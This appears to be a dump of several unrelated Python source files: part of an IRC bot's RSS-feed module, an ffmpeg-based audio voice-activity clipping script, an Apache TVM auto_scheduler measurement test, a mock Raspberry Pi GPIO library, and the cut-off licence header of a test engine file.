rotator_indexfeeds(bot, rssconfig["delays"]["rss_sync"]) rotator_output(bot, rssconfig["delays"]["output"]) empty_database = 1 return bot.say(channel, "Url \"%s\" inserted to database." % feed_url) else: id = already_on_db[0] return bot.say(channel, "Url \"%s\" is already on database with ID: %i" % (feed_url, id)) def rss_delfeed(bot, user, channel, args): """Deletes RSS-feed from sqlite-database by given ID. Should have support for deletion using ID or feed's URL""" db_conn = sqlite3.connect(rssconfig["database"]) d = db_conn.cursor() d.execute("SELECT id, feed_url, channel FROM feeds WHERE id = ? OR feed_url = ?", (args, args,)) row = d.fetchone() feed_url = row[1] if (db_conn.execute("DELETE FROM feeds WHERE channel = ? AND id = ? OR channel = ? AND feed_url = ?", (channel, args, channel, args)).rowcount == 1): db_conn.commit() bot.say(channel, "Feed %s deleted successfully" % feed_url.encode("UTF-8")) d.close() def list_feeds(channel): """Lists channels (or all) RSS-feeds from sqlite-database. Initialize connection to database-file""" db_conn = sqlite3.connect(rssconfig["database"]) d = db_conn.cursor() feeds = [] if (channel == -1): d.execute("SELECT id, feed_url, channel FROM feeds ORDER BY id") else: d.execute("SELECT id, feed_url, channel FROM feeds WHERE channel = ? ORDER BY id", (channel,)) for row in d: id = row[0] feed_url = row[1] feed_url = feed_url.encode('UTF-8') channel = row[2] data = [id, feed_url, channel] feeds.append(data) d.close() return feeds def rss_modify_feed_setting(bot, feed_ident, channel, target, tvalue): """Modifies feed's settings""" db_conn = sqlite3.connect(rssconfig["database"]) d = db_conn.cursor() d.execute("SELECT id, feed_url FROM feeds WHERE id = ? OR feed_url = ?", (feed_ident, feed_ident,)) row = d.fetchone() feed_url = row[1].encode("UTF-8") if (target == "title"): if (db_conn.execute("UPDATE feeds SET feed_title = ? WHERE id = ? OR feed_url = ? AND channel = ?", (tvalue, feed_ident, feed_ident, channel)).rowcount == 1): db_conn.commit() bot.say(channel, "Feed's (%s) title modified to \"%s\"" % (feed_url, tvalue.encode("UTF-8"))) elif (target == "syntax"): if (db_conn.execute("UPDATE feeds SET output_syntax_id = ? WHERE id = ? OR feed_url = ? AND channel = ?", (tvalue, feed_ident, feed_ident, channel)).rowcount == 1): db_conn.commit() bot.say(channel, "Feed's (%s) output syntax modified to \"%s\"" % (feed_url, tvalue.encode("UTF-8"))) else: bot.say(channel, "Invalid syntax! Usage: Add feed: .rss add <feed_url>, Delete feed: .rss del <feed_url/feed_id>, List feeds: .rss list, Change feed settings: .rss set <feed_id/feed_url> title/syntax <value>") d.close() def rss_listfeeds(bot, user, channel, args): """Lists all RSS-feeds added to channel""" feeds = list_feeds(channel) for feed in feeds: bot.say(channel, "%s: %s" % (feed[0], feed[1])) def command_rss(bot, user, channel, args): """Usage: Add feed: .rss add <feed_url>, Delete feed: .rss del <feed_url/feed_id>, List feeds: .rss list, Change feed settings: .rss set <feed_id/feed_url> title/syntax <value>""" try: args = args.split() subcommand = args[0] if (subcommand != "list"): feed_ident = args[1] if (isAdmin(user)): if (subcommand == "add"): if (len(args) > 2): output_syntax = args[2] else: output_syntax = rssconfig["output_syntax"] rss_addfeed(bot, user, channel, feed_ident, output_syntax) elif (subcommand == "del"): rss_delfeed(bot, user, channel, feed_ident) elif (subcommand == "list"): rss_listfeeds(bot, user, channel, None) elif (subcommand == "set"): target = args[2] tvalue = args[3] if (target == "title"): rss_modify_feed_setting(bot, feed_ident, channel, "title", tvalue) elif (target == "syntax"): rss_modify_feed_setting(bot, feed_ident, channel, "syntax", tvalue) else: bot.say(channel, "Invalid syntax! Usage: Add feed: .rss add <feed_url>, Delete feed: .rss del <feed_url/feed_id>, List feeds: .rss list, Change feed settings: .rss set <feed_id/feed_url> title/syntax <value>") except IndexError: bot.say(channel, "Invalid syntax! Usage: Add feed: .rss add <feed_url>, Delete feed: .rss del <feed_url/feed_id>, List feeds: .rss list, Change feed settings: .rss set <feed_id/feed_url> title/syntax <value>") def shorturl(url): try: payload = { 'access_token': rssconfig["bitly_api_key"], 'longUrl': url } r = requests.get("https://api-ssl.bitly.com/v3/shorten", params=payload) if r.status_code == int('500'): log.error('Error in bitly functionality. Check if login or API key is missing from configuration.') return if r.status_code == int('200'): return r.json['data']['url'] except Exception: log.error(traceback.format_exc()) def unescape(text): """Unescape ugly wtf-8-hex-escaped chars.""" def fixup(m): text = m.group(0) if text[:2] == "&#": # character reference try: if text[:3] == "&#x": return unichr(int(text[3:-1], 16)) else: return unichr(int(text[2:-1])) except ValueError: pass else: # named entity try: text = unichr(htmlentitydefs.name2codepoint[text[1:-1]]) except KeyError: pass return text # leave as is return re.sub("&#?\w+;", fixup, text) def remove_html_tags(data): p = re.compile(r'<.*?>') return p.sub('', data) def sqlite_add_item(bot, feed_url, title, url, channel, cleanup): """Adds item with feed-url, title, url, channel and marks it as non-printed""" if not feed_url and title and url: log.debug('Arguments missing in sqlite_add_item.') return try: db_conn = sqlite3.connect(rssconfig["database"]) d = db_conn.cursor() hash_string = url + "?channel=" + channel data = [None, feed_url, title, url, channel, cleanup, hashlib.md5(hash_string).hexdigest()] d.execute("INSERT INTO titles_with_urls VALUES (?, ?, ?, ?, ?, ?, ?)", data) log.info('Added title \"%s\" with URL \"%s\" (%s) to channel %s to database.' % (title, url, feed_url, channel)) id = d.lastrowid db_conn.commit() db_conn.close() except sqlite3.IntegrityError, e: # Couldn't add entry twice return except Exception: log.error('Error in sqlite_add_item') log.error(traceback.format_exc()) pass def indexfeeds(bot): """Updates all RSS-feeds found on database and outputs new elements""" try: cleanup = 0 log.debug("indexfeeds thread started") db_conn = sqlite3.connect(rssconfig["database"]) d = db_conn.cursor() # If table is removed, then create a new one titles_table_exists = d.execute("SELECT count(*) FROM sqlite_master WHERE type='table' AND name='titles_with_urls'").fetchone() if (titles_table_exists[0] == 0): init(None) # Let's count all rows to index rowcount = 0 rows = d.execute("SELECT id, feed_url, channel FROM feeds ORDER BY id") for row in rows: rowcount = rowcount + 1 log.debug('Feed count is: %i' % rowcount) feeds = list_feeds(-1) for feed in feeds: id = feed[0] feed_url = feed[1] log.debug('Indexing feed %s: %s' % (id, feed_url)) channel = feed[2] # If first run of current feed, insert new elements as "printed" so bot won't flood whole feed on startup/insert cleanup = 0 titles_count = d.execute("SELECT count(*) FROM titles_with_urls WHERE feed_url = ?", (feed_url,)).fetchone() if (titles_count[0] == 0): cleanup = 1 feed_data = feedparser.parse(feed_url) feed_data.entries.reverse() for entry in feed_data.entries: try: title = remove_html_tags(entry['title']) url = entry['link'] sqlite_add_item(bot, feed_url, title, url, channel, cleanup) except KeyError, e: log.debug('indexfeeds: Keyerror %s' % e) except Exception, e: log.debug('indexfeeds first: Exception %s' % e) db_conn.close() log.debug("indexfeeds thread terminated") except Exception: log.error('Error in indexfeeds') log.error(traceback.format_exc()) def command_url(bot, user, channel, args): """Prints feed's element url by given id""" id = args try: db_conn = sqlite3.connect(rssconfig["database"]) d = db_conn.cursor() d.execute("SELECT * FROM titles_with_urls WHERE id = ?", (id,)) row = d.fetchone() if (row != None): id = row[0] feed_url = row[1] title = row[2] url = row[3] channel = row[4].encode("UTF-8") url = url.encode("UTF-8") bot.say(channel, "%s" % (url)) except Exception: log.error('Error in command_url') log.error(traceback.format_exc()) def output(bot): """This function is launched from rotator to collect and announce new items from feeds to channel""" try: db_conn = sqlite3.connect(rssconfig["database"]) d = db_conn.cursor() d.execute("SELECT * FROM titles_with_urls WHERE printed='0'") row = d.fetchone() if (row != None): log.debug("New row found for output") id = row[0] feed_url = row[1] feed_output_syntax = d.execute("SELECT output_syntax_id FROM feeds WHERE feed_url = ?", (feed_url,)).fetchone()[0] if (feed_output_syntax == None): feed_output_syntax = rssconfig["output_syntax"] title = row[2] url = row[3] channel = row[4] title = unicode(unescape(title)).encode("UTF-8") channel = channel.encode("UTF-8") url = url.encode("UTF-8") feed_title = d.execute("SELECT feed_title from feeds where feed_url = ?", (feed_url,)).fetchone()[0].encode('UTF-8') if (feed_output_syntax == 0): bot.say(channel, "%s: %s – %s" % (feed_title, title, url)) elif (feed_output_syntax == 1): bot.say(channel, "%s: %s – %s" % (feed_title, title, shorturl(url))) elif (feed_output_syntax == 2): bot.say(channel, "%s: %s (%i)" % (feed_title, title, id)) elif (feed_output_syntax == 3): bot.say(channel, "%s: %s" % (feed_title, title)) elif (feed_output_syntax == 4): bot.say(channel, "%s" % title) data = [url, channel] d.execute("UPDATE titles_with_urls SET printed=1 WHERE URL=? and channel=?", data) db_conn.commit() log.debug("output thread terminated cleanly") except StopIteration: pass except Exception: log.error('Error in output') log.error(traceback.format_exc()) pass def rotator_indexfeeds(bot, delay): """Timer for methods/functions""" try: global t, t2, indexfeeds_callLater if (type(t2).__name__ == 'NoneType'): t = Thread(target=indexfeeds, args=(bot,)) t.daemon = True t.start() elif t2.isAlive() == False: t = Thread(target=indexfeeds, args=(bot,)) t.daemon = True t.start() if (empty_database > 0): indexfeeds_callLater = reactor.callLater(delay, rotator_indexfeeds, bot, delay) except Exception: log.error('Error in rotator_indexfeeds') log.error(traceback.format_exc()) def rotator_output(bot, delay): """Timer for methods/functions""" try: global t, t2, output_callLater if t.isAlive() == False: t2 = Thread(target=output, args=(bot,)) t2.daemon = True t2.start() t2.join() if (empty_database > 0): output_callLater = reactor.callLater(delay, rotator_output, bot, delay) except Exception, e: log.error('Error in rotator_output') log.error(traceback.format_exc())
audio_detection_main.py
from voice_activity_detector import VoiceActivityDetector import os import datetime import subprocess import random import re import threading import cleanup import ffmpeg_calls import logging logging.basicConfig(filename='./logs/example.log',level=logging.DEBUG) #Log format #logging.debug('This message should go to the log file') #logging.info('So should this') #logging.warning('And this, too') class Audio_Detector(): def __init__(self, initial_directory, targetdirectory, wav_directory): self.initial_directory = initial_directory self.targetdirectory = targetdirectory self.wav_directory = wav_directory def shorten_given_file(self, sourcefile, lengthoffile, cuttosize = 1200, randomtoken = True, outfile = None): #takes a file and cuts a random 20 minute sample of each of its audio channels # if the file is shorter than the specified cut size, the output will be a wav of the entire given audio stream # --------- Prints metadata to streams.txt ------------------------ filetype = sourcefile.split(".")[-1] if filetype == "mp4": try: ffmpeg_calls.dump_streams_metadata(sourcefile, self.wav_directory) except Exception as e: log.debug("Could not create streams.txt file") log.debug(e) raise Exception # ---------- Finds number of Streams by Reading Streams.txt file ---------------------- textfile = open(self.wav_directory + "/streams.txt", 'r') file_metadata = textfile.read() textfile.close() detected_streams = re.findall("Stream #0:(.+)Audio:", file_metadata) if lengthoffile <= cuttosize: rnd = 0 else: if randomtoken == False: rnd = 0 else: rnd = random.randint(60, int(lengthoffile - (cuttosize + 10))) outputarrs = [] threads = [] if detected_streams == []: log.warning("No Audio Streams Found") raise Exception elif filetype=="wav": stream_file_name = sourcefile.split("/")[-1] stream_number = stream_file_name.split("output")[0] detected_streams = [stream_number] for stream in detected_streams: #i stores the number of an audio stream i = stream[0] starttime = str(datetime.timedelta(seconds=rnd)) #start time is the rnd seconds token turned to a format ffmpeg can read (HR:MN:SC) starttime = "0" + starttime # Encode every streams into a wav file using threads. if outfile == None: threads.append(threading.Thread(target=ffmpeg_calls.shorten_file, args=(self.wav_directory,starttime, sourcefile, cuttosize, i))) # ffmpeg_calls.shorten_file(starttime, destination_file, cuttosize, i) log.info(i + "output.wav created in " + self.wav_directory) outputarrs.append(self.wav_directory + "/" + str(i) + "output" + ".wav") else: threads.append(threading.Thread(target=ffmpeg_calls.shorten_file_with_specified_outfile, args=(starttime, sourcefile, cuttosize, i, outfile))) # ffmpeg_calls.shorten_file_with_specified_outfile(starttime, destination_file, cuttosize, i, outfile) log.info(outfile + " created") for i in threads: i.start() for i in threads: i.join() #returns the names of the wav files created return outputarrs def create_cutpoints_file(self, arr, destination_file): #returns a text file with the most dense segments listed if destination_file[-10:] != "output.wav": #if the file being cut is not an [0-9]output.wav file, the file will simply output a [0-9]output.wav file destination_file = "output.wav" #otherwise the output file will be the same [0-9]output.wav file that was fed into the function file = open(self.wav_directory + "/" + "cutpoints.txt", "w") num_cuts = int(300/len(arr)) file_name = destination_file.split("/")[-1] for i in range(len(arr)): file.write("file " + file_name + "\n") file.write("inpoint " + str(arr[i]-num_cuts) + "\n") file.write("outpoint " + str(arr[i]) + "\n") file.close() log.info("created text file with cutpoints") return 0 def create_voice_activity_clip(self, filename, outfile_name): log.info("Running VAD on " + str(filename)) try: v = VoiceActivityDetector(filename) except Exception as e: log.info("ERROR at VAD " + str(filename) + " " + e) pass # convert phase recognition array to second format log.info("Converting windows to readible labels for " + str(filename)) try: voice_activity_regions = v.convert_windows_to_readible_labels(v.detect_speech()) except: log.debug("ERROR at convert windows to readable labels for file" + str(filename)) raise Exception voice_activity_regions_array = [] # Flattening the list for region in voice_activity_regions: voice_activity_regions_array = voice_activity_regions_array + list(region.values()) if voice_activity_regions_array != []: log.info("No voice activity detecvted for this clip.") log.info("Finished creating array of voice activity regions") try: #generate a vector of seconds, which is where the array should be cut cut_areas = self.get_most_dense_range(voice_activity_regions_array) #creates a textfile.txt cut areas file in the wav directory self.create_cutpoints_file(cut_areas, filename) except Exception as e: log.debug("could not create a text file with cut areas") log.debug(e) raise Exception if outfile_name == None: #allows you to specify an outfile name, if none is given creates a name file = "cut_stream" + filename[-11] + "_" + self.inputfile[:-4] + ".wav" # creates cut_name for files else: file = outfile_name #creates a concatenated video file with high phrase density try: ffmpeg_calls.create_shortened_file(self.wav_directory, self.targetdirectory, file) except subprocess.CalledProcessError as e: log.debug(e) log.info("Created: " + self.targetdirectory + "/" + file) return file def get_most_dense_range(self, arr, randtoken = False, videolength = 1200): fr_len = 20 #length each segment should be num_cuts = int(120/fr_len) #number of segments that should be combined to give a 300 second clip densities = [] for i in range(fr_len, videolength): _len = len([j for j in arr if i - fr_len <= j <= i]) densities.append(_len) densities = sorted(densities, reverse=True) max_densities = densities[0:num_cuts] ## below loop translates if the max_densities (which are scalars) to the corresponding times where the phrase frequencies occur cut_areas = [] if randtoken is False: for i in range(fr_len, videolength): if len(cut_areas) >= num_cuts: break _len = len([j for j in arr if i - fr_len <= j <= i]) if _len in max_densities: cut_areas.append(i) if randtoken == True: randlocs = random.sample(range(fr_len, videolength, fr_len), num_cuts) for i in randlocs: cut_areas.append(i) return cut_areas # This function takes a video file, parses out its respective audio channels, runs voice activity detection on # those channels, and then generates a 5 minute clips for each channel representing audio with the highest voice # activit. def pre_process_video_file(self, inputfile = "audio.mp4", outfile_name = None, randtoken = False, callnumber = 1): log.info("input before file " + inputfile) #initialize inputs self.inputfile = inputfile self.source_file = self.initial_directory + "/" + self.inputfile log.info("inputfile " + self.inputfile) log.info("source file " + self.source_file) # ------------ Find the length of your file ------------- lengthoffile = int(ffmpeg_calls.retrieve_len(self.source_file)) log.info("Length of file " + str(lengthoffile)) if lengthoffile == 0: log.info("ERROR: Length of file is 0" + inputfile) raise Exception #TODO: create a different function for second time processing. # Transcodes the video file into a wav file for audio analysis # and outputs it to the Wav-Encoded directory. if callnumber >= 2: wav_encoded_files = [self.initial_directory + "/" + inputfile] else: try: wav_encoded_files = self.shorten_given_file(self.source_file, lengthoffile=lengthoffile, cuttosize=2400) #shortens a given file and returns filepath except Exception as e: log.debug("ERROR: Can't shorten given file") log.debug(e) raise Exception log.info("wav_encoded_files " + str(wav_encoded_files)) # Only do audio analysis on a file longer than 5 minutes. if lengthoffile > 300: threads = [] for wav_file in wav_encoded_files: threads.append(threading.Thread(target=self.create_voice_activity_clip, args = (wav_file, outfile_name,))) print(threads) for i in threads: i.start() for i in threads: i.join() else: log.warning("File is short. Uploading the wav file without audio analysis") # Copies all the output.wav files to the Wav-Clips to be uploaded without further # processing for a file that is 5 or fewer minutes long. for filename in os.listdir(self.wav_directory): if "output.wav" in filename: dest_path = self.targetdirectory + "/" + "cut_stream" + filename[-11] + "_" + self.inputfile[:-4] + ".wav" cleanup.copy_file(self.wav_directory + "/" + filename, dest_path)
test_auto_scheduler_measure.py
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. """ Test measurement and log serialization. """ import json import multiprocessing import tvm from tvm import topi from tvm import te, auto_scheduler import tempfile import tvm.testing from test_auto_scheduler_common import matmul_auto_scheduler_test, get_tiled_matmul def record_common(dag, s): target = tvm.target.Target("llvm") task = auto_scheduler.SearchTask(compute_dag=dag, workload_key="test", target=target) inp = auto_scheduler.measure.MeasureInput(task, s) res = auto_scheduler.measure.MeasureResult([0.1], 0, "", 0.2, 1) # Test in-memory record processing. record_str = auto_scheduler.measure_record.dump_record_to_string(inp, res) r_inp, r_res = auto_scheduler.measure_record.load_record_from_string(record_str) # Only check the workload_key for simplification. assert inp.task.workload_key == r_inp.task.workload_key assert str(res) == str(r_res) # Test file-based record processing. with tempfile.NamedTemporaryFile() as fp: auto_scheduler.save_records(fp.name, [inp], [res]) log_reader = auto_scheduler.RecordReader(fp.name) inputs, _ = log_reader.read_lines() assert len(inputs) == 1 s1 = dag.infer_bound_from_state(s) s2 = dag.infer_bound_from_state(inputs[0].state) assert s1 == s2 assert not (s1 == dag.get_init_state()) def test_record_split_reorder_fuse_annotation(): if not tvm.testing.device_enabled("llvm"): return A = te.placeholder((512, 512), name="A") B = te.placeholder((512, 512), name="B") k = te.reduce_axis((0, 512), name="k") C = te.compute((512, 512), lambda i, j: te.sum(A[i][k] * B[k][j], axis=[k]), name="C") dag = auto_scheduler.ComputeDAG([A, B, C]) s = dag.get_init_state() # Split its0 = s.split(C, s[C].iters[0], [4, 8, 8]) its1 = s.split(C, s[C].iters[4], [8, 4, 4]) # Reorder s.reorder( C, [its0[0], its1[0], its0[1], its1[1], its0[2], its1[2], its0[3], s[C].iters[8], its1[3]] ) # Fuse s.fuse(C, [s[C].iters[0], s[C].iters[1], s[C].iters[2]]) # Parallel s.parallel(C, s[C].iters[0]) # Thread bind(The blockIdx & threadIdx are used in GPU, just for record testing here) s.bind(C, s[C].iters[1], "blockIdx.x") s.bind(C, s[C].iters[2], "threadIdx.z") s.bind(C, s[C].iters[3], "vthread") # Unroll s.unroll(C, s[C].iters[4]) # Vectorize s.vectorize(C, s[C].iters[6]) record_common(dag, s) def test_record_compute_at_root_inline_cache_read_write(): if not tvm.testing.device_enabled("llvm"): return A = te.placeholder((512, 512), name="A") AA = topi.nn.relu(A) B = te.placeholder((512, 512), name="B") k = te.reduce_axis((0, 512), name="k") C = te.compute((512, 512), lambda i, j: te.sum(AA[i][k] * B[k][j], axis=[k]), name="C") dag = auto_scheduler.ComputeDAG([A, B, C]) s = dag.get_init_state() # Cache Write C_shared = s.cache_write(C, "shared") # Compute At s.compute_at(C_shared, C, s[C].iters[0]) # Cache Read B_global = s.cache_read(B, "global", [C_shared]) s.compute_at(B_global, C_shared, s[C_shared].iters[2]) # Compute Inline s.compute_inline(AA) # Compute Root s.compute_root(C_shared) record_common(dag, s) def test_record_follow_split_follow_fused_split(): if not tvm.testing.device_enabled("llvm"): return A = te.placeholder((512, 512), name="A") B = te.placeholder((512, 512), name="B") k = te.reduce_axis((0, 512), name="k") C = te.compute((512, 512), lambda i, j: te.sum(A[i][k] * B[k][j], axis=[k]), name="C") D = topi.nn.relu(C) E = topi.nn.relu(D) dag = auto_scheduler.ComputeDAG([A, B, E]) s = dag.get_init_state() # Follow Split s.split(C, s[C].iters[0], [4, 2, 8, 4], True) split_step0 = len(s.transform_steps) - 1 s.follow_split(C, s[C].iters[5], split_step0, 4) # Follow Fused Split its0 = s.split(E, s[E].iters[0], [4, 2, 8, 4], True) split_step1 = len(s.transform_steps) - 1 its1 = s.split(E, s[E].iters[5], [2, 4, 2, 4], True) split_step2 = len(s.transform_steps) - 1 its = [] for i0, i1 in zip(its0, its1): its.append(i0) its.append(i1) for i in range(0, 5): s.fuse(E, [s[E].iters[i], s[E].iters[i + 1]]) s.follow_fused_split(D, s[D].iters[0], [split_step1, split_step2], 2, True) record_common(dag, s) def test_record_pragma_storage_align_rfactor(): if not tvm.testing.device_enabled("llvm"): return A = te.placeholder((512, 512), name="A") B = te.placeholder((512, 512), name="B") k = te.reduce_axis((0, 512), name="k") C = te.compute((512, 512), lambda i, j: te.sum(A[i][k] * B[k][j], axis=[k]), name="C") dag = auto_scheduler.ComputeDAG([A, B, C]) s = dag.get_init_state() # Rfactor ko, _ = s.split(C, s[C].iters[2], [16]) s.rfactor(C, ko, 2) # Pragma s.pragma(C, s[C].iters[0], "auto_unroll_max_step$64") # StorageAlign s.storage_align(C, s[C].iters[-1], 8, 4) record_common(dag, s) def test_recover_measure_input(): task = auto_scheduler.SearchTask( func=matmul_auto_scheduler_test, args=(512, 512, 512), target="llvm" ) inp = auto_scheduler.measure.MeasureInput(task, task.compute_dag.init_state) res = auto_scheduler.measure.MeasureResult([0.1], 0, "", 0.2, 1) with tempfile.NamedTemporaryFile() as fp: auto_scheduler.save_records(fp.name, [inp], [res]) log_reader = auto_scheduler.RecordReader(fp.name) inputs, _ = log_reader.read_lines() assert len(inputs) == 1 raw_inp = inputs[0] correct_inp = auto_scheduler.measure.recover_measure_input(raw_inp) assert str(correct_inp.task.compute_dag) == str(inp.task.compute_dag) correct_inp = auto_scheduler.measure.recover_measure_input(raw_inp, rebuild_state=True) assert str(correct_inp.state) == str(inp.state) def test_workload_dis_factor(): calc = auto_scheduler.measure_record.calc_workload_dis_factor # Identical target_wkl_key = json.dumps( ["func1", [8, 3, 224, 224], [32, 3, 3, 3], [0, 0], [1, 1], "float32"] ) assert calc(target_wkl_key, target_wkl_key) == 1 # Compatible with a factor wkl_key = json.dumps(["func1", [1, 3, 112, 112], [32, 3, 3, 3], [0, 0], [1, 1], "float32"]) assert calc(target_wkl_key, wkl_key) == 8 * 2 * 2 # Incompatible argument with zeros wkl_key = json.dumps(["func1", [8, 3, 224, 224], [32, 3, 3, 3], [1, 1], [1, 1], "float32"]) assert calc(target_wkl_key, wkl_key) == float("inf") wkl_key = json.dumps(["func1", [8, 3, 224, 224], [32, 3, 3, 3], [0, 0], [0, 0], "float32"]) assert calc(target_wkl_key, wkl_key) == float("inf") # Incompatible non-integter argument wkl_key = json.dumps(["func1", [8, 3, 224, 224], [32, 3, 3, 3], [0, 0], [1, 1], "int8"]) assert calc(target_wkl_key, wkl_key) == float("inf") # Incompatible function wkl_key = json.dumps(["func2", [8, 3, 224, 224], [32, 3, 3, 3], [0, 0], [1, 1], "float32"]) assert calc(target_wkl_key, wkl_key) == float("inf") # Incompatible due to non-dividable factor wkl_key = json.dumps(["func1", [8, 3, 223, 223], [32, 3, 3, 3], [0, 0], [1, 1], "float32"]) assert calc(target_wkl_key, wkl_key) == float("inf") def test_measure_local_builder_runner(): if not tvm.testing.device_enabled("llvm"): return task = auto_scheduler.SearchTask( func=matmul_auto_scheduler_test, args=(512, 512, 512), target="llvm" ) for enable_cpu_cache_flush in [True, False]: minp = auto_scheduler.MeasureInput(task, task.compute_dag.init_state) local_builder = auto_scheduler.LocalBuilder() local_runner = auto_scheduler.LocalRunner( timeout=60, enable_cpu_cache_flush=enable_cpu_cache_flush ) bress = local_builder.build([minp]) assert bress[0].error_no == 0 mress = local_runner.run([minp], bress) assert mress[0].error_no == 0 def test_measure_local_builder_rpc_runner(): if not tvm.testing.device_enabled("llvm"): return task = auto_scheduler.SearchTask( func=matmul_auto_scheduler_test, args=(512, 512, 512), target="llvm" ) for enable_cpu_cache_flush in [True, False]: minp = auto_scheduler.MeasureInput(task, task.compute_dag.init_state) local_builder = auto_scheduler.LocalBuilder() measure_ctx = auto_scheduler.LocalRPCMeasureContext( timeout=60, enable_cpu_cache_flush=enable_cpu_cache_flush ) rpc_runner = measure_ctx.runner bress = local_builder.build([minp]) assert bress[0].error_no == 0 mress = rpc_runner.run([minp], bress) assert mress[0].error_no == 0 del measure_ctx def measure_local_builder_rpc_runner_spawn(): assert multiprocessing.get_start_method(False) == "spawn" test_measure_local_builder_rpc_runner() @tvm.testing.requires_llvm def test_measure_local_builder_rpc_runner_spawn(): ctx = multiprocessing.get_context("spawn") p = ctx.Process(target=measure_local_builder_rpc_runner_spawn) p.start() p.join() @tvm.testing.requires_llvm def test_measure_target_host(): task = auto_scheduler.SearchTask( func=matmul_auto_scheduler_test, args=(512, 512, 512), target="llvm", target_host="llvm -mtriple=aarch64-linux-gnu", ) inp = auto_scheduler.measure.MeasureInput(task, task.compute_dag.init_state) res = auto_scheduler.measure.MeasureResult([0.1], 0, "", 0.2, 1) with tempfile.NamedTemporaryFile() as fp: auto_scheduler.save_records(fp.name, [inp], [res]) log_reader = auto_scheduler.RecordReader(fp.name) inputs, _ = log_reader.read_lines() assert len(inputs) == 1 raw_inp = inputs[0] recovered_inp = auto_scheduler.measure.recover_measure_input(raw_inp) assert str(recovered_inp.task.target_host) == str(inp.task.target_host) if __name__ == "__main__": test_record_split_reorder_fuse_annotation() test_record_compute_at_root_inline_cache_read_write() test_record_follow_split_follow_fused_split() test_record_pragma_storage_align_rfactor() test_recover_measure_input() test_measure_local_builder_runner() test_measure_local_builder_rpc_runner() test_measure_target_host()
GPIO.py
#! /usr/bin/env python3 # -*- coding: utf-8 -*- # ## ############################################################# # GPIO.py # # Author: Mauricio Matamoros # Licence: MIT # Date: # # ## ############################################################# # Future imports (Python 2.7 compatibility) from __future__ import absolute_import from __future__ import division from __future__ import print_function from time import time, sleep from threading import Thread from random import seed, randint # ## ############################################################# # Constants # ## ############################################################# LOW = 0x00 HIGH = 0x01 BCM = 0x00 BOARD = 0x01 OUT = 0x01 IN = 0x00 # End constants _io_mode = BCM _pin_map = { #BOARD : BCM/GPIO 3 : 2, 5 : 3, 7 : 4, 8 : 14, 10 : 15, 11 : 17, 12 : 18, 13 : 27, 15 : 22, 16 : 23, 18 : 24, 19 : 10, 21 : 9, 22 : 25, 23 : 11, 24 : 8, 26 : 7, 27 : 0, 28 : 1, 29 : 5, 31 : 6, 32 : 12, 33 : 13, 35 : 19, 36 : 16, 37 : 26, 38 : 20, 40 : 21, } def _board2bcm(pin): return _pin_map.get(pin, -1) def _check_pin(pin): if not isinstance(pin, int): raise ValueError("pin number must be an integer") if pin < 0 or pin > 27: raise ValueError("Not an I/O pin") def setwarnings(flag): pass def setmode(mode): global _io_mode _io_mode = mode def setup(pin, io_mode, initial=LOW): if _io_mode == BOARD: pin = _board2bcm(pin) _check_pin(pin) _io_pins[pin].setup(io_mode, initial) def input(pin): if _io_mode == BOARD: pin = _board2bcm(pin) _check_pin(pin) return _io_pins[pin].value def output(pin, value): if _io_mode == BOARD: pin = _board2bcm(pin) _check_pin(pin) _io_pins[pin].value = value def cleanup(): for pwm in _pwms: pwm.stop() del pwm for pin in _io_pins: _io_pins[pin].setup(IN) class PWM: def __init__(self, channel, frequency): _pwms.append(self) self._thread = None self._running = False self._duty_cycle = 0 self._frequency = 1 if _io_mode == BOARD: channel = _board2bcm(channel) self._pin = _io_pins[channel] #end def def __del__(self): if self._thread is not None: self.stop() if _pwms is not None: for pwm in _pwms: if pwm is self: _pwms.remove(self) break #end def def _worker(self): self._running = True reset_time = 0 flank_time = 0 # run until stopped while self._running: now = int(time() * 1000) if now >= flank_time: self._pin.value = 0 if now >= reset_time: self._pin.value = 1 reset_time = int(now + 1000.0 / self._frequency) flank_time = int(now + self._duty_cycle * 10.0 / self._frequency) sleep(0.001) #end while #end def def start(self, dc): self.ChangeDutyCycle(dc) self._thread = Thread(target=self._worker) self._thread.start() #end def def stop(self): if self._thread is not None: self._running = False if self._thread.is_alive(): self._thread.join() self._thread = None #end def def ChangeFrequency(self, freq): if not isinstance(freq, int) or not isinstance(freq, float): raise ArgumentException("Invalid type") self._frequency = freq #end def def ChangeDutyCycle(self, dc): if dc < 0 or dc > 100: raise ArgumentException("dc out of range") self._duty_cycle = dc #end def #end class def _random_pin_value(): return randint(0, 2) class GPIO_PIN: def __init__(self, gpio_pin_num): self.gpio_pin_num = gpio_pin_num self._buffer = 0 self.setup(IN) def setup(self, io_mode, initial_value=LOW): self.io_mode = io_mode if self.io_mode is OUT: self.value = initial_value @property def value(self): return self._buffer @value.setter def value(self, value): self.write(value) def _dump(self, value): pass def read(self): return self._buffer def write(self, value): if self.io_mode is OUT: self._buffer = 1 if value else 0 def __repr__(self): if self.gpio_pin_num < 10: return 'GPIO 0{}'.format(self.gpio_pin_num) else: return 'GPIO {}'.format(self.gpio_pin_num) seed(time()) _pwms = [] _io_pins = {} for i in range(1, 28): _io_pins[i] = GPIO_PIN(i)
testengine.py
#!/usr/bin/env python # Copyright (c) 2006-2010 Tampere University of Technology # # Permission is hereby granted, free of charge, to any person obtaining # a copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, # distribute, sublicense, and/or sell copies of the Software, and to # permit persons to whom the Software is furnished to do so, subject to # the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE # LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION # OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION # WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS 